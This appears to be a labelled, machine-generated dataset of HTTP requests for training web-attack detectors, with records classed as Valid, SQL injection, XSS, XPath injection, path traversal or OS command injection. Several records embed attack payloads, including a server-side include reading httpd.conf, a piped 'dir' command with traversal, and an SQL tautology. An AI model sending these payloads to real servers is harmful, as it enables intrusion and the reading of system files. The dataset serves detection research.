GET /03Wo0DFgtnl82mshr/tDLtisieai/hpkl4PnZMYdZmtchepn/GD/iEEKhoG4PJRoxQFIr/cj0mQhCnv1/la133USgE39.tiff?snhshnrvAmsibeh=rodn&sIHd2r=%3C%21--%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&fei=%3D+eo HTTP/1.1
Host: www.ruinm.it
Connection: ii5w
Accept: text/*, audio/x-wav;q=0.3, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hsdsts-eil3seKs;q=0.1
Cache-Control: no-transform
Client-ip: 88.15.240.28
Cookie: 2QWMY4YZ1=2tI esteypaSrug;rhaHreszoaaax37=RiElipA;ms-G=1973;rtnryolitobe0=eDassoeiey
Cookie2: $Version="64"
Date: Sun, 15 Oct 06 21:48:02 GMT
ETag: W/"HB4MgAj2e0M.0QXb"
Expect: dNlo
From: bny0t2@rj5o.gov
If-Modified-Since: Tue, 08 Dec 09 20:47:00 GMT
If-Unmodified-Since: Thu, 06 Nov 08 06:28:18 GMT
If-Match: "5S2a5xeq29wu6Auy"
If-None-Match: *
If-Range: Mon, 06 Apr 09 20:56:03 GMT
Max-Forwards: 5348
MIME-Version: 1.9
Pragma: rw3leUg=iose0
Proxy-Authorization: thos inow=tceine
Authorization: Basic bzRhZzpIazdSdGFpaA==
Range: 2975-
Referer: /FjtyneoS/oieplg/hioeg/ttt5ose.sh
TE: deflate;q=0.4,gzip;q=0.6,trailers
Trailer: Connection
User-Agent: Twntooolth (t16C82; e6xjQ4X; im--gVlwo; t_uBE2qUb1)
UA-CPU: Sparc
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 468x7869
Via: 3.0 223.213.41.58:544, HTTP/1.3 144.44.248.41, FTP/6.0 250.151.244.186
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 167 www.de7acs.shtml "1i93" "Sun, 27 Dec 09 10:08:59 UTC"
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 0280999804959
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39805
Start - Id: 10852
class: Valid
GET /EfkpP/hrc-PQfF@IkgaSDfdh/iUho/aeqrA4ounv5eoeein9/npjaz2@bh81gd/feaelrlaaiuN0.jsp?otqwRutbS=asscript8u+ae+ftp&.QL0dcICGeD=97&eiw21mqt=091&ald=d+2erllinkrEoe94o8&bbttnonsen=hhnj&lErreTddsuu=heh1de&seRbnitt=htpass&W95eOgkIVLBd=etcm&Lzmy=ea&KHls8dE7J=ntA&m5dtsuPaeey=03&d9e8tweEig1cmx=%2F%40jo%3E%29paSee&ttEcNe1oel=tgzsNlrals&9ayiTceakl9uimr=Imetatp HTTP/1.1
Host: www.ghiiu.gov:2
Connection: gnlsEr
Accept: video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 2aoer1ee-peOksh;q=0.6, lv-9IiS;q=0.8, toAtdto-zi8ou, itiueC-ta2thao;q=0.2, iweg-0fRoa0ac
Cache-Control: min-fresh=212
Client-ip: 209.130.16.38
Cookie: tf1atgsO=fwbng;ftenaEcl2=293803
Cookie2: $Version="033"
Date: Mon, 12 Apr 04 20:48:54 GMT
ETag: ".c_cmZXX5jkS-ppEQ"
Expect: 0uajps=oetevwee
From: MAtn@aarleli.uk
If-Modified-Since: Mon, 12 Mar 07 06:32:21 UTC
If-Unmodified-Since: Tue, 11 May 04 05:23:28 CET
If-Match: *
If-None-Match: "i3hHFc9UyVZ.VZlpb"
If-Range: Mon, 20 Dec 04 11:54:09 GMT
Max-Forwards: 4
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=fdHl5caa
Authorization: Basic eFQxZWM6Ym9vcG0=
Range: 482201-12436,533208-73364,4-3551
Referer: /eatH.htm
TE: trailers,gzip;q=0.1,trailers
Trailer: Trailer
User-Agent: Mozilla/7.4 (Windows; U; Windows NT 0.6; yu-so; rv:0.1.6) Gecko/12869007
UA-CPU: 68000
UA-Disp: 5761,4253,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6413x457
Via: edm/0.1 227.224.87.147
Transfer-Encoding: compress
Upgrade: clli/2.2, tee/6.7, b4acRj/4.6, raese/1.9
Warning: 546 36.80.1.116 "IenaaoenSzdE4y5eo" 
X-Forwarded-For: 96.51.246.201
X-Serial-Number: 907495686273869
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10852
Start - Id: 44130
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: 168.224.44.19:80
Connection: rllgy
Accept: */*;q=0.8
Accept-Charset: x-mac-japanese;q=0.3, cp-932;q=0.2, cp-950
Accept-Encoding: 
Accept-Language: 4le-yAp4mgoT
Cache-Control: max-stale
Client-ip: 196.173.120.66
Cookie: not=5;sdogvF=as;soasln=018;7tws6tqGrif=eqH mtei/processing-instructionys
Cookie2: $Version="549"
Date: Sun, 24 May 09 01:48:13 GMT
ETag: "G3tMuf5X5f@OyB7Fh"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Wed, 05 May 10 19:43:07 GMT
If-Unmodified-Since: Mon, 02 Jan 06 19:23:03 CET
If-Match: "uyPE5HkkTKbicCYJ"
If-None-Match: *
If-Range: "K1LqRt.C3aG.OYscEtx"
Max-Forwards: 750
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: 14nnle i0nornu3=tmoIce
Range: 2856-325921,765830-7785,3752-597
Referer: /v0oh/olsag/hiad1/tibo.nsf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/5.7 (Windows; U; Win 9x 4.9; de-sf; rv:4.9.1) Gecko/02013724
UA-CPU: 68000
UA-Disp: 0410,9029,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1501x189
Via: FTP/0.0 www.t2actsl.png, 1.6 www.etndo.gif, 5.6 187.24.170.221
Transfer-Encoding: deflate
Upgrade: bletts/8.4, eawgt/6.8, sXn/8.3, sei0e/5.7
Warning: 051 11.28.159.211 "vuojxaosel7oelrcfSe" 
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44130
Start - Id: 50062
class: XPathInjection
POST /6IxqT3CRW/aRKNt.wEv7ZXP.HK.gif? HTTP/1.1
Content-Length: 172
Content-Language: drber,e,el41oy8o
Content-Encoding: deflate
Content-Location: /yswmxna/ssnao/eoaces.tiff
Content-MD5: dWU5SXdoZW1yZ25tdDBzaw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 24 Apr 07 24:13:23 UTC
Last-Modified: Sat, 11 Oct 08 15:55:38 CET
Host: www.taaeecu.ch
Connection: gohonRh
Accept: */*;q=0.9
Accept-Charset: iso-10646-ucs-2, iso-10646-ucs-2, x-mac-cyrillic
Accept-Encoding: deflate
Accept-Language: thbhrA-daise
Cache-Control: only-if-cached
Client-ip: 78.20.93.165
Cookie: h6rcr9icns=hghtaccesWhpNe+;ts1t=tdin/keoho/Ihbt/child::node()[position()=606]    or   'mddta4'    =';d9ca8=rdoret
Cookie2: $Version="188"
Date: Wed, 16 Feb 05 22:21:02 UTC
ETag: W/"1@69SC6OhsctPUz"
Expect: 100-continue
From: zilj@eJseheh.st
If-Modified-Since: Sun, 30 Sep 07 08:39:45 GMT
If-Unmodified-Since: Thu, 11 Mar 10 12:11:56 CET
If-Match: "4e4yTPA28OcvJLv5BU"
If-None-Match: "5pjPmGizVNiaTxYD7GX"
If-Range: Sat, 11 Feb 06 01:24:28 GMT
Max-Forwards: 4
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic ZWVpZmluYTpybnJydDJlbw==
Authorization: Basic ZWNzYWU6UnRwM3Q=
Range: 68-,-66180,-89
Referer: /tbnrIe/nudvSela.nsf
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.1 (Windows; U; Windows NT 9.7; yk-wx; rv:5.0.2) Gecko/58099075
UA-CPU: MIPS
UA-Disp: 086,0919,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3705x532
Via: 9.9 www.thfO.jpeg, FTP/2.7 123.98.110.203
Transfer-Encoding: ellnh
Upgrade: seeim/7.5, eeEad/9.1, noaakN/7.4, uat/4.4, Shme/3.3
Warning: 633 118.107.47.29 "ehmrqron" "Sun, 16 Apr 06 02:34:14 GMT"
X-Forwarded-For: 18.212.91.180
X-Serial-Number: 34243313236496
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4oc=68&Txa=9824&gaykIf=oLi1hghdSirnyse&ur=9&ZWNH@R8=53451&Rafbelotai6iw=62734&r7t=rG1dqSQFidcY&h5e=ddrcpsoptinioptr%29&6%u57ZZG=252660&lenoehwh=naN&re6beaisia=ecopya3nid20L

End - Id: 50062
Start - Id: 18741
class: Valid
GET /egcgfp/r@wt3aJLLcj190IsWr.gif?h3G0il9XI=syssToHwttr&oqrjm=ietcznr HTTP/1.1
Host: www.tnerU02.gov
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-age=8
Client-ip: 219.245.151.93
Cookie: uiubeoosTtissxs=9r(;kiiilcl7=aprocessing-instruction;tzjaoitetE=229001147
Cookie2: $Version="357"
Date: Tue, 11 Jul 06 03:44:28 UTC
ETag: "CXvAWFbVtSA2Kq_"
Expect: 100-continue
From: envreer4@lEts7.gov
If-Modified-Since: Mon, 21 May 07 07:43:40 CET
If-Unmodified-Since: Mon, 02 Feb 09 23:16:12 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3556
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM aWFvYnRCZW5lN3pzb2Fwa2l0Z3FleUlhN2k3dW1ybnR0YWVjZHJTaA==
Authorization: irtnt ESroi=tcgLmds
Range: 43867-
Referer: /ea5wkt.avi
TE: gzip;q=0.7
Trailer: Accept
User-Agent: Mozilla/4.2 (Machintosh; U; PPC 9.4; rF-RY; rv:4.9.2) Gecko/90014911
UA-CPU: 68000
UA-Disp: 752,4892,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 854x2880
Via: 2.7 www.ynnravib.png
Transfer-Encoding: identity
Upgrade: tsph/1.2, tuaja/3.0, znkshr/1.9, anfUk5/0.8, nvas/2.0
Warning: 921 www.wRltoroI.gif "hibn" 
X-Forwarded-For: 38.79.221.170
X-Serial-Number: 57174297786
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18741
Start - Id: 2986
class: Valid
GET /telnetb7H1scriptG_Y_j/lmrjoikd5DqXzu/bhesdenn98/oFp.Y/gnen3mea/ohacs2Fll.tiff?YFNwFw1W-=wtnconnectM%26e+h%2Ftm+brd&czteo2c=2csi4&tclbre=37&hmajtas=st&maec=84253&nnsptsiUtyssth=46782&kwefrezn=7849444&FAbhtpassKxp_openevalR=58374064&Hao3=54374274 HTTP/1.1
Host: 27.139.7.169
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, compress, compress;q=0.4, compress, deflate;q=0.5
Accept-Language: *;q=0.4
Cache-Control: in2d9an='hae'
Client-ip: 10.142.110.57
Cookie: k0hgV_cfromt=olmSs1tiygc2=s;hehtwnc9nNAe=hJJmfBArscz;en=ofXbBAQi;Ouedesg=egxslibt$rG;Le8cessPi=568909;to6ier7foarBd=e2stltjnOni
Cookie2: $Version="81"
Date: Tue, 16 May 06 18:19:19 GMT
ETag: "o942pdQXoL4kHmnt"
Expect: 100-continue
From: sMew@IhehlCaold.be
If-Modified-Since: Wed, 05 May 04 08:39:38 UTC
If-Unmodified-Since: Sun, 12 Nov 06 17:50:33 CET
If-Match: "p2KJn4bTAiZUXP5j"
If-None-Match: *
If-Range: Sun, 27 Aug 06 02:58:57 UTC
Max-Forwards: 83
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic bGUxcjpiQTlh
Authorization: s7a85 rusa=ws16ho5
Range: 91188-
Referer: http://ontnq.fr/vtwsah/dramihe/sna7da.cfm
TE: trailers
Trailer: User-Agent
User-Agent: ue7tstxe
UA-CPU: StrongARM
UA-Disp: 767,9233,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4979x0191
Via: HTTP/6.4 92.229.37.28:41034
Transfer-Encoding: gzip
Upgrade: er1/3.7, ohbtar/9.6, igrns/9.6, QebnrE/9.1, rWoN/5.7
Warning: 133 129.24.35.131 "eutrftdlptmud" 
X-Forwarded-For: 200.70.38.178
X-Serial-Number: 39984855
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2986
Start - Id: 4350
class: Valid
POST /oUwBUvZKaoM-@oKW/orst@-Yacceptxml@ujE6/38/tebOnnscDe7as/7tenSadeoc/Aeh1Sscdq4iosiaa72.htm? HTTP/1.0
Content-Length: 252
Content-Language: 3uwhtae,drvi
Content-Encoding: deflate
Content-Location: http://4eg5aT.de/noWz8auc/auaoa/heroeef/sgcww/lcoaimh.txt
Content-MD5: NHQ5bDVoYWV0N2VtZW9vRw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 31 Jan 05 24:22:10 CET
Last-Modified: Thu, 10 Apr 08 22:23:07 UTC
Host: www.8ciE.uk
Connection: wdtw
Accept: audio/*, image/*, image/*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=3929
Client-ip: 34.254.2.107
Cookie: lDdxBstie=830;ozohthH=8eezsF;K9-VBALEiV=tilsiau
Cookie2: $Version="29"
Date: Sat, 14 Jan 06 13:59:28 UTC
ETag: "mLTw1OYilhNdxc6"
Expect: cauh=hhir
From: oneEoqpN@Ie5atqZgN.cz
If-Modified-Since: Mon, 20 Sep 04 01:59:35 CET
If-Unmodified-Since: Sun, 26 Jun 05 17:03:12 CET
If-Match: "eCAmS-QB7cFS8dFDM_"
If-None-Match: *
If-Range: Sat, 23 Aug 08 15:10:08 CET
Max-Forwards: 858
MIME-Version: 0.8
Pragma: de2i=ixiu
Proxy-Authorization: Digest opaque="eeii"
Authorization: NTLM ZHl0elNpbmVZbGxycmVyZXNlZGxzdWFnRWVzcTJTdGxpc3NvYWdkb2Q=
Range: 972-943760,-311,94-125
Referer: http://www.a9un.gov/les9r/te3eeha.bin
TE: chunked
Trailer: Range
User-Agent: Mozilla/6.8 (X11; U; Linux i586 3.0; jt-ae; rv:5.0.8) Gecko/29532819
UA-CPU: x86
UA-Disp: 187,8771,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 1837x602
Via: FTP/8.0 www.kfnmaH.html:52777, 3.0 www.sO3ej.jpeg:0094
Transfer-Encoding: surs
Upgrade: ihdt/5.8, ieavv/5.2
Warning: 055 244.62.200.40:2 "0plu" 
X-Forwarded-For: 139.143.108.151
X-Serial-Number: 83365893402992
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5isxepAbe=tn&&tontl=66&t4sssIpsst=sHKl.6&tni=a st =lNrrn)tsa&p0uhetct=681721560&tzrtntf1Un=uf;ooeo5uI&adeesymmnireers=tmySwep&oWlhpaslad=6549&kBo_=57711223&asrjEesbmtme=smM7&hRpXUP=mlrT&ttd7f=eao&eeet2tgt2Ooe0=ozfzh_4aJG&1vPrcp2D2iFdOl=97240068

End - Id: 4350
Start - Id: 47388
class: XSS
GET /pJHX/he81tsfse.gif?ngTtrpnddEtemmi=%3Clink++++rel+%3D++%22+++++stylesheet+++%22+++++href++++%3D+%22+javascript%3A+++%5Balert%28%27nunlEbenb%27%29%3B%5D+++++%22++%3E HTTP/1.1
Host: www.inomHib.ch
Connection: ewesi
Accept: */*;q=0.5
Accept-Charset: iso-8859-2;q=0.1, cp-950;q=0.2, iso-2022-jp;q=0.0, euc-kr;q=0.0, iso-8859-8-i;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-age=2
Client-ip: 193.205.45.58
Cookie: S5zVAJchildOSp=fiatm ;toosowg=dHootqil;ie=9091
Cookie2: $Version="936"
Date: Sun, 14 Feb 10 20:02:11 CET
ETag: W/"vz07DW56vH-BLZy"
Expect: 100-continue
From: ra6tapm@ejbc5awp.com
If-Modified-Since: Tue, 11 Jan 05 05:25:11 CET
If-Unmodified-Since: Fri, 27 Jan 06 05:44:25 GMT
If-Match: "nmzOLIVMdJHDZZZFtdHP"
If-None-Match: *
If-Range: Tue, 06 Nov 07 02:49:58 CET
Max-Forwards: 7856
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: cHest eInm=wotttdoe
Authorization: NTLM ZWFldnJyZXNBbU5naW1JbnRlY3B0dnJyZXN6b2VjbnJlc2Vz
Range: 35419-,75138-2674,165640-
Referer: http://ermrozh.de/astpuoV/ienteh/sydamhi/9munecf5/lytnTT.asp
TE: trailers,deflate;q=0.9
Trailer: Accept-Charset
User-Agent: Mozilla/9.8 (X11; U; Open BSD i386 5.5; fa-ne; rv:3.5.8) Gecko/86854458
UA-CPU: MIPS
UA-Disp: 7745,5252,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1670x058
Via: 0.0 240.221.188.123, HTTP/0.4 www.eYEtzha.jpg:8, 4.3 www.ivo4he.css
Transfer-Encoding: gzip
Upgrade: uns/4.6, rb2/9.4, tsywas/1.7, Onrj/5.3, anii/8.9
Warning: 270 120.123.100.132 "hvi74Edbooyr" "Mon, 07 Jan 08 14:05:19 UTC"
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 6529673477463
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47388
Start - Id: 44959
class: PathTransversal
GET /tlkb0tel/sIlftte7hdvkep/u4/aozhgattilx/g-LNsH4Ghs/tr76XA/enueopsntieOilfLKh/4recblnau/a63n72pPRS/a4n/u-1Rphp1catj_dEusr@-.html?aArejqhesps=ctdivtrrln%2Ft&WWxdBoz=44&catj1n@Pbgsound=1F7j6MltTMy&esnerluemfseit=eUom&n5Aqtdtgeai0g=idf1maan8&4LeztBr9ld=is%3Banull5i&enEashz7aaieS=t8T&ceng0jop9tt=ltcx&hnuh=f%28raaarps1dn&bnih=184879900&a0A98scsej=9467&oltidtio=894296876&2os=6&4O-YqAP=ylmlai&eseN=.%2F..%2F.%2F..%2F HTTP/1.0
Host: www.e6eeIN.biz
Connection: close
Accept: text/html;q=0.7, video/quicktime;q=0.6, audio/*
Accept-Charset: iso-8859-15
Accept-Encoding: compress;q=0.1, deflate;q=0.6
Accept-Language: re3tp-aO;q=0.5
Cache-Control: min-fresh=07891
Client-ip: 108.71.153.69
Cookie: eTAewteixeetwee=nd;das25=erjo;nb@AK8zVH=hasinulujk2;jk3sery1=1412056;atcef6efg5cf=ro5r-dzT;hhaerynci=mwqeti
Cookie2: $Version="02"
Date: Fri, 01 Apr 05 02:30:02 UTC
ETag: W/"@Ha_U7Oeumx8BwDN1Ut."
Expect: 100-continue
If-Modified-Since: Thu, 29 Sep 05 11:41:28 UTC
If-Unmodified-Since: Sun, 30 Jan 05 12:40:37 CET
If-Match: ".YkpI5eOdgQw7J0nToI"
If-None-Match: "sfeSHScfadv2-25T-S"
If-Range: *
Max-Forwards: 4
MIME-Version: 1.3
Pragma: T8=rAlrfr
Proxy-Authorization: NTLM ZWhkeDZyMW1hQTFyZGROZm5pdnNTZWx0cnRlb293b2FydkR1OXQ=
Authorization: Digest nonce
Range: 692467-8,088341-5,956298-14
Referer: /i81oodrg.asp
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/7.3 (X11; U; Linux i386 8.3; Tu-ft; rv:6.4.9) Gecko/64894838
UA-CPU: Sparc
UA-Color: color16
UA-Pixels: 298x509
Via: dSS/5.0 184.217.61.230:0321
Transfer-Encoding: identity
Upgrade: nsi/5.0
Warning: 869 39.20.119.131 "cruietilr4eat3pmses" 
X-Serial-Number: 9376895954650597
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44959
Start - Id: 35136
class: SqlInjection
PUT /cF6.8uvicGMnUtvzb/twg/ydo0h08Esh6ulrs7oY/eZilwdz.cDJJxOlh/eQFFsOreUd1/Rf/a0l3ueZn53Ml3QND/WBszE/pftpQa2B/e7G8qde_3bPViS7.php? HTTP/1.1
Content-Length: 122
Content-Language: R,uo
Content-Encoding: deflate
Content-Location: http://www.eo1rad.cz/di7b4eg/cdcnzvew/0rayyo.mp3
Content-MD5: dWVyb29vb2VlaElzQXNkag==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Aug 08 22:27:38 CET
Last-Modified: Wed, 04 Aug 04 11:19:56 UTC
Host: www.g5aEnned.uk
Connection: close
Accept: */*
Accept-Charset: iso-8859-6, x-mac-turkish, ks_c_5601-1987;q=0.4
Accept-Encoding: 
Accept-Language: h-nboa;q=0.4, dct-nroaae;q=0.9, hY-l1Ean;q=0.0, sde-8oe
Cache-Control: max-age=4694
Client-ip: 80.97.152.196
Cookie: hChhqlwnfoeir2=ul;sJy=elnucoounionmoala;osnuneaR=et;8iws2r=cmdi;msAhroaysesot=toleiee
Cookie2: $Version="87"
Date: Sun, 04 Sep 05 12:20:39 UTC
ETag: W/"MaFaMljEGmVHfr4xyQJ"
Expect: eel5Noee
From: hnfn@paunju2xam.uk
If-Modified-Since: Mon, 31 Jul 06 20:37:16 UTC
If-Unmodified-Since: Tue, 09 Feb 10 10:21:10 GMT
If-Match: "36@whpe5_bc2ZOx"
If-None-Match: *
If-Range: Mon, 16 Jun 08 21:53:42 CET
Max-Forwards: 239
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest username="e7tedn"
Authorization: Digest opaque="feure"
Range: 9644-,893-04607,798896-
Referer: http://akoo8htx.ch/dJgothde.swf
TE: trailers,chunked;q=0.4
User-Agent: Mozilla/5.9 (X11; U; Solaris 1.8; ns-ve; rv:3.5.0) Gecko/64630678
UA-Disp: 3713,1872,32
UA-OS: Windows NT
UA-Color: color8
Via: HTTP/5.8 6.208.85.243, 9.7 157.95.249.131, 2.2 www.iTCyT.png
Transfer-Encoding: identity
Upgrade: masee/8.5, drdmb/5.6, asJ/9.9, oume2Y/4.6, pmsuya/8.2
X-Forwarded-For: 126.226.47.150
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rdfm9ip=e&eedn=7546244&yroederntrOe=rsnn&AxoyI6gNfeeml=dA&7nEnss0ldaF6ycz=OR  'olzn4ar'  =     'Sim'+'ple'

End - Id: 35136
Start - Id: 6991
class: Valid
PUT /vtiemn3aWi/nodeGQQw1-P1/lbj8JE/wm@bojsS_u1G.tiff? HTTP/1.1
Content-Length: 330
Content-Language: ae,xna4
Content-Encoding: compress
Content-Location: /anePaat8.tar
Content-MD5: b3QyM2xyZXN3bGFleHJ0Tg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Oct 09 17:38:15 GMT
Last-Modified: Sun, 24 Jun 07 01:16:43 GMT
Host: www.enes1ron.fr
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 202.39.217.81
Cookie: tz8deee5aseha=lbiiesmors;mk6mqe=56772325;.VGuxKVrgxh=ss=execlG :ti=Mnc-
Cookie2: $Version="63"
Date: Mon, 07 Mar 05 01:04:41 GMT
ETag: W/"4HW5m1z0YPa-.Mv-dE"
Expect: 100-continue
From: 66a1mld0@Rrfehea.ch
If-Modified-Since: Thu, 25 Sep 08 24:20:29 UTC
If-Unmodified-Since: Mon, 20 Feb 06 08:42:33 GMT
If-Match: *
If-None-Match: "yIaHQxjVQxQmV6b"
If-Range: "F@2UPZpGNYvb0UqoSkRb"
Max-Forwards: 4150
MIME-Version: 3.4
Pragma: jzs='cxoi'
Proxy-Authorization: aasa0 Tiemls=e9ea
Authorization: tdssoa deaoe=28lsl7g
Range: 544-,459-
Referer: http://cpjnF.cz/tukmi/0cuseei/rznDeree.css
TE: trailers,deflate
Trailer: Host
User-Agent: Mozilla/7.1 (compatible; llhtn; Windows NT; 0mc7Sn)
UA-CPU: 68000
UA-Disp: 4258,294,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 821x4420
Via: 2.3 www.eokli.html, tpgl/4.2 146.164.160.42, 3.3 208.19.81.159
Transfer-Encoding: compress
Upgrade: n2e/1.3
Warning: 506 www.isxea3en.htm "fCnsiousntr6A9nt" "Thu, 15 Mar 07 14:14:02 CET"
X-Forwarded-For: 67.65.254.52
X-Serial-Number: 95729667
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5PtmpUdmzwY7=aOnefnhlgr&ho8sismtyea=r En&f3ssrrispanHlw=70993&nb=ttt2&eg9toinS5g=95299360&itosiw2o=4edowindow.openreachild Ea$ae&tnymni2=95&HUBblMtoH=y4TpHAI&utmapndhednt=slebva8eYimgu&cee0nluhoE=+es6+>nid1ninO|ix&ulreeonlans=rxp_deleteenselectexecei464i7rOy&yswdovtdoin3r=gtaRAeeyrNTrwhcinu&Seta=e5-goaN&reaalnEpAee=u4y

End - Id: 6991
Start - Id: 46054
class: PathTransversal
GET /r_o/sv4p6yI4kvTOmP/edG/exec-.vVx-/12v5object6wFrm9xB/rL1sW@@boI0oUWuHdDi/kVAAY.Notelnetallh/msmj/ej@Svq6OjFrXYZX/4.W0zWXuP7/c5u9rtEjiitit/enRxV.php4?liby=6913961&sdaf3ish7oookux=0186626&rmtZafnym=312&ehABAEo=98970163&replaceYTzjn_k9j=slWj7bVln0P&lantErclyop=24178660&w1mcetje6SNneMi=l1KTGLwqR&atain=vf%2F+Em%3Dreopd+&h5nrscTegutoilk=peToa77&hihdrss=929&mdhf=aw4%3CoRoeeuts HTTP/1.0
Host: 103.146.217.69
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: itTircom-iic;q=0.9, uomeycl-hisnhE;q=0.1, u-olSujykc;q=0.8, eihzsino-Hepal;q=0.5, nFtex-R
Cache-Control: max-age=9627
Client-ip: 28.91.166.181
Cookie: hnlink-_=7gsnt%usa-Hevbscriptpz9h;UGfAph=/,,,/ijOjeh/dg7iI/passwd
Cookie2: $Version="25"
Date: Tue, 18 Apr 06 09:57:09 GMT
ETag: "5JIPCcPany@.X45"
Expect: 100-continue
From: pH95do@eieRrn3C.org
If-Modified-Since: Sat, 30 Jan 10 05:30:16 GMT
If-Unmodified-Since: Tue, 23 Aug 05 05:55:41 CET
If-Match: "twRobgImlBx3YJEdt-.T"
If-None-Match: *
If-Range: Thu, 01 Jun 06 16:35:41 UTC
Max-Forwards: 45
MIME-Version: 1.1
Pragma: knel9='gonaoant'
Authorization: NTLM dDFvaWNwSGRMSHNhc2VubnN6bHl0ZW93aFRUbWx0YmFycw==
Referer: /awdeVveo/zgodsxye/o9difds/agizyipy/re8c.jsp
TE: deflate;q=0.4,chunked,trailers
Trailer: TE
User-Agent: natztwhd
UA-CPU: 68000
UA-Disp: 478,2158,8
UA-OS: Solaris
UA-Color: color32
Via: 7.0 www.ogiNa.css:1
Transfer-Encoding: gzip
Upgrade: domfsc/6.5, zfo9/7.9
Warning: 762 198.204.149.124:790 "fimrmytnwtsNote" "Tue, 03 Jul 07 15:54:22 GMT"
X-Forwarded-For: 177.17.19.118
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46054
Start - Id: 7794
class: Valid
PUT /ewgnHcy.gn6-/eJx.css? HTTP/1.1
Content-Length: 203
Content-Language: j6heze3
Content-Encoding: gzip
Content-Location: http://6n7td.cz/yodsancp/woieWee/oodsjor.png
Content-MD5: bXNTczFqYWdvcHR1dmluaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Jul 08 09:22:52 UTC
Last-Modified: Sat, 15 Dec 07 16:47:42 UTC
Host: www.cnetEo.uk
Connection: keep-alive
Accept: */*
Accept-Charset: hz-gb-2312, iso-8859-4;q=0.9, windows-1253
Accept-Encoding: gzip;q=0.2, gzip, deflate;q=0.1
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 248.78.197.68
Cookie: ntnetatetnae=0o9D;uautoexec0FgeUF1khttps=422778;eooe4reiIde=xtermLlsa;xsgtteene=i anedsTeshstdinnegchild@h
Cookie2: $Version="432"
Date: Tue, 03 Feb 04 23:09:08 UTC
ETag: W/"HgZzVWWDRk8h5.QPt@"
Expect: 100-continue
From: msDNtTe@mtt5jy.de
If-Modified-Since: Sun, 14 Feb 10 24:45:38 CET
If-Unmodified-Since: Wed, 21 Jun 06 10:03:05 UTC
If-Match: "n8nZVpXAZSbH3.qcq"
If-None-Match: *
If-Range: "o-yDpiW8delak7au"
Max-Forwards: 19
MIME-Version: 8.5
Pragma: at8mmbf='ayh'
Proxy-Authorization: NTLM aXF6Z3NCeWUzYXNtQ09NdW05YXRpcnNzYm8zdFRuYUFlYWpmb2VlbmU=
Authorization: Digest nonce
Range: -43411,-175805,6-
Referer: /cstmd3n.swf
TE: trailers
Trailer: Expect
User-Agent: irQn@y4mW http://www.ooixraxe.uk
UA-CPU: StrongARM
